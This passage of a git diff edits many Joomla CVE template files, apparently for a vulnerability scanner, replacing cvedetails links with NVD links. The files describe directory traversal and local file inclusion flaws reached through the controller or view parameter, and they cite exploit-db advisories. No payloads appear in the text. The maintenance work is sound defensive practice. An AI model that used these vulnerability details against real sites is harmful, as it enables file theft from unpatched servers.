index.php. reference: - https://www.exploit-db.com/exploits/12118 - - https://www.cvedetails.com/cve/CVE-2010-1532 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1532 - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1533.yaml b/cves/2010/CVE-2010-1533.yaml index 50a833080d..2c563f7014 100644 --- a/cves/2010/CVE-2010-1533.yaml +++ b/cves/2010/CVE-2010-1533.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12142 - - https://www.cvedetails.com/cve/CVE-2010-1533 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1533 - http://web.archive.org/web/20140723212810/http://secunia.com/advisories/39258/ - http://www.exploit-db.com/exploits/12142 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml index a7222cf33b..aeacbfb726 100644 --- a/cves/2010/CVE-2010-1534.yaml +++ b/cves/2010/CVE-2010-1534.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12067 - - https://www.cvedetails.com/cve/CVE-2010-1534 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1534 - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39213/ - http://web.archive.org/web/20140724182459/http://secunia.com/advisories/39352/ remediation: Upgrade to a supported version diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml index dd182e49a7..1261076eaf 100644 --- a/cves/2010/CVE-2010-1535.yaml +++ b/cves/2010/CVE-2010-1535.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12151 - - https://www.cvedetails.com/cve/CVE-2010-1535 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1535 - http://web.archive.org/web/20140725030342/http://secunia.com/advisories/39254/ - http://www.exploit-db.com/exploits/12151 classification: diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml index 7858f54cb4..7f1a64ad1a 100644 --- a/cves/2010/CVE-2010-1540.yaml +++ b/cves/2010/CVE-2010-1540.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. reference: - https://www.exploit-db.com/exploits/11625 - - https://www.cvedetails.com/cve/CVE-2010-1540 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1540 - http://web.archive.org/web/20140721042709/http://secunia.com/advisories/38777/ - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ classification: diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml index b02548d3dd..7f6175bb4d 100644 --- a/cves/2010/CVE-2010-1601.yaml +++ b/cves/2010/CVE-2010-1601.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12236 - - https://www.cvedetails.com/cve/CVE-2010-1601 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1601 - http://web.archive.org/web/20140803084823/http://secunia.com/advisories/39472/ - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt classification: diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml index 7ea5cac135..b318c999b0 100644 --- a/cves/2010/CVE-2010-1602.yaml +++ b/cves/2010/CVE-2010-1602.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12283 - - https://www.cvedetails.com/cve/CVE-2010-1602 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1602 - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt classification: cve-id: CVE-2010-1602 diff --git a/cves/2010/CVE-2010-1603.yaml b/cves/2010/CVE-2010-1603.yaml index cea0d41ac0..9a76a5ad53 100644 --- a/cves/2010/CVE-2010-1603.yaml +++ b/cves/2010/CVE-2010-1603.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12284 - - https://www.cvedetails.com/cve/CVE-2010-1603 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1603 - http://web.archive.org/web/20210518112730/https://www.securityfocus.com/bid/39546 - http://www.vupen.com/english/advisories/2010/0931 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml index 434bfacdfe..44fbaac879 100644 --- a/cves/2010/CVE-2010-1607.yaml +++ b/cves/2010/CVE-2010-1607.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12316 - - https://www.cvedetails.com/cve/CVE-2010-1607 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1607 - http://web.archive.org/web/20210121195713/https://www.securityfocus.com/bid/39608/ - http://web.archive.org/web/20111227231442/http://secunia.com/advisories/39539/ classification: diff --git a/cves/2010/CVE-2010-1653.yaml b/cves/2010/CVE-2010-1653.yaml index eefedff98e..67fc0c2d82 100644 --- a/cves/2010/CVE-2010-1653.yaml +++ b/cves/2010/CVE-2010-1653.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12430 - - https://www.cvedetails.com/cve/CVE-2010-1653 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1653 - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/ classification: diff --git a/cves/2010/CVE-2010-1658.yaml b/cves/2010/CVE-2010-1658.yaml index c2c6ba0371..da29fb24ce 100644 --- a/cves/2010/CVE-2010-1658.yaml +++ b/cves/2010/CVE-2010-1658.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12427 - - https://www.cvedetails.com/cve/CVE-2010-1658 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1658 - http://www.vupen.com/english/advisories/2010/1007 classification: cve-id: CVE-2010-1658 diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml index b088feba43..e9dbb293d7 100644 --- a/cves/2010/CVE-2010-1714.yaml +++ b/cves/2010/CVE-2010-1714.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12168 - - https://www.cvedetails.com/cve/CVE-2010-1714 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1714 - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt - http://web.archive.org/web/20140723192327/http://secunia.com/advisories/39413/ classification: diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml index b991fb91dc..6ff524272d 100644 --- a/cves/2010/CVE-2010-1715.yaml +++ b/cves/2010/CVE-2010-1715.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12174 - - https://www.cvedetails.com/cve/CVE-2010-1715 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt classification: cve-id: CVE-2010-1715 diff --git a/cves/2010/CVE-2010-1717.yaml b/cves/2010/CVE-2010-1717.yaml index 3d72e3973f..7b153f345a 100644 --- a/cves/2010/CVE-2010-1717.yaml +++ b/cves/2010/CVE-2010-1717.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12291 - - https://www.cvedetails.com/cve/CVE-2010-1717 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1717 - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/ - http://www.vupen.com/english/advisories/2010/0924 classification: diff --git a/cves/2010/CVE-2010-1718.yaml b/cves/2010/CVE-2010-1718.yaml index a70b5e7b3f..6a4b59dba4 100644 --- a/cves/2010/CVE-2010-1718.yaml +++ b/cves/2010/CVE-2010-1718.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12282 - - https://www.cvedetails.com/cve/CVE-2010-1718 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1718 - http://web.archive.org/web/20140805094212/http://secunia.com/advisories/39521/ - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ classification: diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml index 0cc0b497f2..983965d8a6 100644 --- a/cves/2010/CVE-2010-1719.yaml +++ b/cves/2010/CVE-2010-1719.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12233 - - https://www.cvedetails.com/cve/CVE-2010-1719 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1719 - http://www.exploit-db.com/exploits/12233 classification: cve-id: CVE-2010-1719 diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml index f155d6b950..01cfbea978 100644 --- a/cves/2010/CVE-2010-1722.yaml +++ b/cves/2010/CVE-2010-1722.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12177 - - https://www.cvedetails.com/cve/CVE-2010-1722 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1722 - http://web.archive.org/web/20140723201810/http://secunia.com/advisories/39409/ - http://www.exploit-db.com/exploits/12177 classification: diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml index 75b3e0903c..5c624591b0 100644 --- a/cves/2010/CVE-2010-1723.yaml +++ b/cves/2010/CVE-2010-1723.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12289 - - https://www.cvedetails.com/cve/CVE-2010-1723 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1723 - http://web.archive.org/web/20140805101847/http://secunia.com/advisories/39524/ - http://www.exploit-db.com/exploits/12289 classification: diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml index 9e87647ddb..7e026905bb 100644 --- a/cves/2010/CVE-2010-1858.yaml +++ b/cves/2010/CVE-2010-1858.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11853 - - https://www.cvedetails.com/cve/CVE-2010-1858 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1858 - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/ - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml index c3585c1038..37a6aa24ff 100644 --- a/cves/2010/CVE-2010-1875.yaml +++ b/cves/2010/CVE-2010-1875.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11851 - - https://www.cvedetails.com/cve/CVE-2010-1875 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - http://web.archive.org/web/20140802140355/http://secunia.com/advisories/39074/ - http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/ classification: diff --git a/cves/2010/CVE-2010-1878.yaml b/cves/2010/CVE-2010-1878.yaml index 2204b99fec..b2cbceda02 100644 --- a/cves/2010/CVE-2010-1878.yaml +++ b/cves/2010/CVE-2010-1878.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12317 - - https://www.cvedetails.com/cve/CVE-2010-1878 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1878 - http://web.archive.org/web/20210121195712/https://www.securityfocus.com/bid/39606/ - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt classification: diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml index 0e3c8d8590..bd90b8cca0 100644 --- a/cves/2010/CVE-2010-1952.yaml +++ b/cves/2010/CVE-2010-1952.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12239 - - https://www.cvedetails.com/cve/CVE-2010-1952 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1952 - http://web.archive.org/web/20151016194238/http://secunia.com/advisories/39475/ - http://www.exploit-db.com/exploits/12239 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml index 33803c361e..12986c2358 100644 --- a/cves/2010/CVE-2010-1953.yaml +++ b/cves/2010/CVE-2010-1953.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12288 - - https://www.cvedetails.com/cve/CVE-2010-1953 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1953 - http://www.vupen.com/english/advisories/2010/0927 - http://www.exploit-db.com/exploits/12288 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml index 563749ac73..9a5af501c8 100644 --- a/cves/2010/CVE-2010-1954.yaml +++ b/cves/2010/CVE-2010-1954.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12287 - - https://www.cvedetails.com/cve/CVE-2010-1954 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1954 - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/ - http://www.exploit-db.com/exploits/12287 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml index 5a64f68bc5..1d829b5920 100644 --- a/cves/2010/CVE-2010-1955.yaml +++ b/cves/2010/CVE-2010-1955.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12238 - - https://www.cvedetails.com/cve/CVE-2010-1955 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/ - http://web.archive.org/web/20140803091440/http://secunia.com/advisories/39473/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml index 40d609582a..e6ff49a84d 100644 --- a/cves/2010/CVE-2010-1956.yaml +++ b/cves/2010/CVE-2010-1956.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12285 - - https://www.cvedetails.com/cve/CVE-2010-1956 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1956 - http://web.archive.org/web/20140805105431/http://secunia.com/advisories/39522/ - http://www.exploit-db.com/exploits/12285 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml index 98363e98d2..866f847570 100644 --- a/cves/2010/CVE-2010-1957.yaml +++ b/cves/2010/CVE-2010-1957.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12235 - - https://www.cvedetails.com/cve/CVE-2010-1957 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1957 - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-1977.yaml b/cves/2010/CVE-2010-1977.yaml index 62d676323f..4611a09ba8 100644 --- a/cves/2010/CVE-2010-1977.yaml +++ b/cves/2010/CVE-2010-1977.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12083 - - https://www.cvedetails.com/cve/CVE-2010-1977 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1977 - http://web.archive.org/web/20210121195306/https://www.securityfocus.com/bid/39243/ - http://web.archive.org/web/20140724201603/http://secunia.com/advisories/39356/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1979.yaml b/cves/2010/CVE-2010-1979.yaml index 7f083ff294..6daafed742 100644 --- a/cves/2010/CVE-2010-1979.yaml +++ b/cves/2010/CVE-2010-1979.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12088 - - https://www.cvedetails.com/cve/CVE-2010-1979 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1979 - http://web.archive.org/web/20140724185517/http://secunia.com/advisories/39360/ - http://www.exploit-db.com/exploits/12088 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1980.yaml b/cves/2010/CVE-2010-1980.yaml index 06dc394908..7ab7c7f861 100644 --- a/cves/2010/CVE-2010-1980.yaml +++ b/cves/2010/CVE-2010-1980.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12085 - - https://www.cvedetails.com/cve/CVE-2010-1980 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1980 - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt - http://www.exploit-db.com/exploits/12085 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1981.yaml b/cves/2010/CVE-2010-1981.yaml index 9b0586ed87..dad825beec 100644 --- a/cves/2010/CVE-2010-1981.yaml +++ b/cves/2010/CVE-2010-1981.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12087 - - https://www.cvedetails.com/cve/CVE-2010-1981 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1981 - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt - http://www.exploit-db.com/exploits/12087 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1982.yaml b/cves/2010/CVE-2010-1982.yaml index a11af27071..644c1e67ec 100644 --- a/cves/2010/CVE-2010-1982.yaml +++ b/cves/2010/CVE-2010-1982.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12121 - - https://www.cvedetails.com/cve/CVE-2010-1982 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1982 - http://web.archive.org/web/20140723233933/http://secunia.com/advisories/39202/ - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1983.yaml b/cves/2010/CVE-2010-1983.yaml index 3ce379a6df..75f670f672 100644 --- a/cves/2010/CVE-2010-1983.yaml +++ b/cves/2010/CVE-2010-1983.yaml @@ -7,7 +7,7 @@ info: description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12055 - - https://www.cvedetails.com/cve/CVE-2010-1983 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1983 - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt - http://www.exploit-db.com/exploits/12055 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2033.yaml b/cves/2010/CVE-2010-2033.yaml index 5bd8b33f5d..aea0f1ab64 100644 --- a/cves/2010/CVE-2010-2033.yaml +++ b/cves/2010/CVE-2010-2033.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - - https://www.cvedetails.com/cve/CVE-2010-2033 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2033 - http://web.archive.org/web/20140805143014/http://secunia.com/advisories/39873/ - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml index 04f804fda0..d4c8d0d1c0 100644 --- a/cves/2010/CVE-2010-2034.yaml +++ b/cves/2010/CVE-2010-2034.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34003 - - https://www.cvedetails.com/cve/CVE-2010-2034 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2034 - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2035.yaml b/cves/2010/CVE-2010-2035.yaml index 091206bed2..b86cacfbbb 100644 --- a/cves/2010/CVE-2010-2035.yaml +++ b/cves/2010/CVE-2010-2035.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34006 - - https://www.cvedetails.com/cve/CVE-2010-2035 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2035 - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2036.yaml b/cves/2010/CVE-2010-2036.yaml index 108e86df89..6e5211ae51 100644 --- a/cves/2010/CVE-2010-2036.yaml +++ b/cves/2010/CVE-2010-2036.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34004 - - https://www.cvedetails.com/cve/CVE-2010-2036 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2036 - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml index 25f2e3df11..d2a6e70210 100644 --- a/cves/2010/CVE-2010-2037.yaml +++ b/cves/2010/CVE-2010-2037.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34005 - - https://www.cvedetails.com/cve/CVE-2010-2037 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2037 - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2045.yaml b/cves/2010/CVE-2010-2045.yaml index 6d407ff966..075ebb9811 100644 --- a/cves/2010/CVE-2010-2045.yaml +++ b/cves/2010/CVE-2010-2045.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12595 - - https://www.cvedetails.com/cve/CVE-2010-2045 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2045 - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-2050.yaml b/cves/2010/CVE-2010-2050.yaml index ae40b3ac41..3744e87181 100644 --- a/cves/2010/CVE-2010-2050.yaml +++ b/cves/2010/CVE-2010-2050.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12611 - - https://www.cvedetails.com/cve/CVE-2010-2050 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2050 - http://web.archive.org/web/20210121200643/https://www.securityfocus.com/bid/40185/ - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml index 9ac39bcc09..8e186c5eaf 100644 --- a/cves/2010/CVE-2010-2122.yaml +++ b/cves/2010/CVE-2010-2122.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - - https://www.cvedetails.com/cve/CVE-2010-2122 